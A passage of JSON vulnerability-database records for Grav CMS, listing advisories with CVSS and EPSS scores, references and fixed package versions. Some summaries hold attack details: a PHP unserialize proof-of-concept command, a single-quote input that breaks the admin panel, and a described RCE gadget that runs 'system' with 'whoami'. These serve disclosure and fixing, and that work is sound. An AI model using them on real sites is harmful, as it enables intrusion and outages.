"VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-7jaz-7xjc-kka1" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-a8y8-y4zt-zqbv" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-bwvg-jg4z-nyhp" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-ru55-uj84-p3dr" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-yh73-zyju-vqge" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" }, { "vulnerability": "VCID-zg5t-uqx2-87fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42" } ], "aliases": [ "CVE-2023-34251", "GHSA-f9jf-4cp4-4fq5" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-m1sj-emwx-5fek" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49330?format=api", "vulnerability_id": "VCID-p1u7-9mk4-fkcr", "summary": "Grav Admin Plugin vulnerable to User Enumeration & Email Disclosure\nA **user enumeration and email disclosure vulnerability** exists in Grav **v1.7.49.5** with Admin plugin **v1.10.49.1**.\nThe \"Forgot Password\" functionality at `/admin/forgot` leaks information about valid usernames and their associated email addresses through distinct server responses.\nThis allows an attacker to enumerate users and disclose sensitive email addresses, which can be leveraged for targeted attacks such as password spraying, phishing, or social engineering.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66307", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18764", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66307" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349" }, { "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/" } ], "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66307", "reference_id": "CVE-2025-66307", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66307" }, { "reference_url": "https://github.com/advisories/GHSA-q3qx-cp62-f6m7", "reference_id": "GHSA-q3qx-cp62-f6m7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q3qx-cp62-f6m7" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7", "reference_id": "GHSA-q3qx-cp62-f6m7", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66307", "GHSA-q3qx-cp62-f6m7" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p1u7-9mk4-fkcr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49311?format=api", "vulnerability_id": "VCID-p5d4-8rvg-uqem", "summary": "Grav is vulnerable to a DOS on the admin panel\n# DOS on the admin panel\n**Severity Rating:** Medium \n\n**Vector:** Denial Of Service\n\n**CVE:** XXX\n\n**CWE:** 400 - Uncontrolled Resource Consumption\n\n**CVSS Score:** 4.9\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H\n\n## Analysis\n\nA Denial of Service (DoS) vulnerability has been identified in the application related to the handling of `scheduled_at` parameters. Specifically, the application fails to properly sanitize input for cron expressions. By manipulating the `scheduled_at` parameter with a malicious input, such as a single quote, the application admin panel becomes non-functional, causing significant disruptions to administrative operations.\n\nThe only way to recover from this issue is to manually access the host server and modify the `backup.yaml` file to correct the corrupted cron expression\n\n## Proof of Concept\n\n1) Change the value of `scheduled_at` parameter to `'` as shown in the following figures at the `http://127.0.0.1/admin/tools` endpoint, and observe the response in the second figure:\n \n *Figure: Http request on tool endpoint*\n\n *Figure: Http response on tool endpoint*\n\n2) When trying to access the admin panel, the panel is broken as shown in the following figure. Additionally, the value change is reflected in the `backup.yaml` file, as shown in the second figure:\n \n *Figure: Error message view*\n\n *Figure: Backup.yaml file*\n\n\n## Workarounds\nNo workaround is currently known\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and support services are core\ncompetencies of X41.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66303", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00138", "scoring_system": "epss", "scoring_elements": "0.3361", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66303" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/" } ], "url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66303", "reference_id": "CVE-2025-66303", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66303" }, { "reference_url": "https://github.com/advisories/GHSA-x62q-p736-3997", "reference_id": "GHSA-x62q-p736-3997", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x62q-p736-3997" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997", "reference_id": "GHSA-x62q-p736-3997", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66303", "GHSA-x62q-p736-3997" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p5d4-8rvg-uqem" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95924?format=api", "vulnerability_id": "VCID-r2dh-em54-nyfz", "summary": "Grav has Insecure Deserialization in File Cache\n# Insecure Deserialization in File Cache\n\n- **Severity:** High \n- **CWE:** CWE-502\n- **Location:** `system/src/Grav/Framework/Cache/Adapter/FileCache.php`\n- **Sink:** `unserialize($value, ['allowed_classes' => true])`\n\n## Affected version(s)\n\n- **Affected:** `>= 1.7.44` and `<= 1.7.49.5` (verified in current codebase and changelog-covered releases).\n- **Fixed:** No upstream fix identified in the reviewed branch at the time of analysis.\n- **Notes:** Earlier `1.7.x` releases may also be affected, but were not fully back-traced in this review.\n\n## Notes\n`allowed_classes => true` allows object instantiation and does not constrain classes.\n\n## PoC (Primitive Demonstration)\n\n### Preconditions\n- Local PHP runtime.\n- Goal is to validate the deserialization primitive used in cache retrieval.\n\n### Steps\n```bash\nphp -r '\nclass CacheWakeup { public function __wakeup(){ file_put_contents(\"/tmp/grav_filecache_poc.txt\", \"wakeup\"); } }\n\n$payload = serialize(new CacheWakeup());\nunserialize($payload, [\"allowed_classes\" => true]);\n\necho file_exists(\"/tmp/grav_filecache_poc.txt\") ? \"FILECACHE_UNSERIALIZE_TRIGGERED\\n\" : \"FILECACHE_UNSERIALIZE_NOT_TRIGGERED\\n\";\n'\n```\n\n### Expected Result\n- Output contains: `FILECACHE_UNSERIALIZE_TRIGGERED`.\n\n### Interpretation\nThis reproduces the same unsafe primitive used by `FileCache::doGet()`:\n`unserialize($value, ['allowed_classes' => true])`.\nIf cache files are attacker-tampered, object magic methods may execute.\n\n## Exploit Preconditions\n- Cache file poisoning/tampering capability.\n\n## Recommendation\n- Avoid object deserialization in cache payloads.\n- Use non-object formats and integrity protection for cache files.\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`c66dfeb5f`](https://github.com/getgrav/grav/commit/c66dfeb5f) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `Framework\\Cache\\Adapter\\FileCache` now HMAC-signs every cache payload with `Security::getNonceKey()` on write, and verifies the HMAC on read. Tampered, forged, or pre-upgrade files are treated as cache misses and unlinked instead of being unserialized. The on-disk format is now versioned:\n\n```\nv2\n<expires>\n<key>\n<hmac-hex>\n<serialized>\n```\n\nExisting caches rebuild transparently on first read. Note that `Framework\\Cache\\Adapter\\FileCache` isn't wired into Grav's main cache path — Symfony's `FilesystemAdapter` is — but the class is reachable by plugin and downstream consumers, so the hardening applies defensively.\n\n**Files:**\n- [`system/src/Grav/Framework/Cache/Adapter/FileCache.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Framework/Cache/Adapter/FileCache.php).\n- [`tests/unit/Grav/Common/Security/FileCacheSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/FileCacheSecurityTest.php) — round-trip, tampered-payload rejection, wrong-key forgery rejection, pre-v2 file rebuild, key-field mismatch.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-7317", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00066", "scoring_system": "epss", "scoring_elements": "0.20571", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-7317" }, { "reference_url": "https://github.com/devsamuelsantiago/grav-cms-filecache-object-injection", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C" }, { "value": "5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/" } ], "url": "https://github.com/devsamuelsantiago/grav-cms-filecache-object-injection" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5f", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C" }, { "value": "5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/" } ], "url": "https://github.com/getgrav/grav/commit/c66dfeb5f" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gwfr-jfjf-92vv", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C" }, { "value": "5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gwfr-jfjf-92vv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7317", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7317" }, { "reference_url": "https://vuldb.com/submit/798732", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C" }, { "value": "5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/" } ], "url": "https://vuldb.com/submit/798732" }, { "reference_url": "https://vuldb.com/vuln/359965", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C" }, { "value": "5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/" } ], "url": "https://vuldb.com/vuln/359965" }, { "reference_url": "https://vuldb.com/vuln/359965/cti", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C" }, { "value": "5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "1.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/" } ], "url": "https://vuldb.com/vuln/359965/cti" }, { "reference_url": "https://github.com/advisories/GHSA-gwfr-jfjf-92vv", "reference_id": "GHSA-gwfr-jfjf-92vv", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-gwfr-jfjf-92vv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-7317", "GHSA-gwfr-jfjf-92vv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r2dh-em54-nyfz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93666?format=api", "vulnerability_id": "VCID-rcyu-yu31-n7gu", "summary": "Grav has multiple RCE vectors: unsafe unserialize (x3), command injection in git clone, SSTI blocklist bypass\nMultiple RCE vectors were found in Grav CMS. Three are critical, two are high.\n\n**1. Unsafe unserialize() in JobQueue — direct RCE gadget (Critical)**\n\n`system/src/Grav/Common/Scheduler/JobQueue.php:465` calls `unserialize(base64_decode(...))` without restricting `allowed_classes`. The `Job` class has `call_user_func_array($this->command, $this->args)` in its execution path, which is a direct gadget chain — inject a serialized `Job` with `command = 'system'` and `args = ['whoami']`.\n\nThe same codebase actually has a `Serializable` trait that correctly restricts classes, so this inconsistency stands out.\n\n**2. Unsafe unserialize() in FileCache — arbitrary class instantiation (Critical)**\n\n`system/src/Grav/Framework/Cache/Adapter/FileCache.php:75` does `unserialize($value, ['allowed_classes' => true])`. That `true` allows instantiation of any class. If an attacker can write to the cache directory 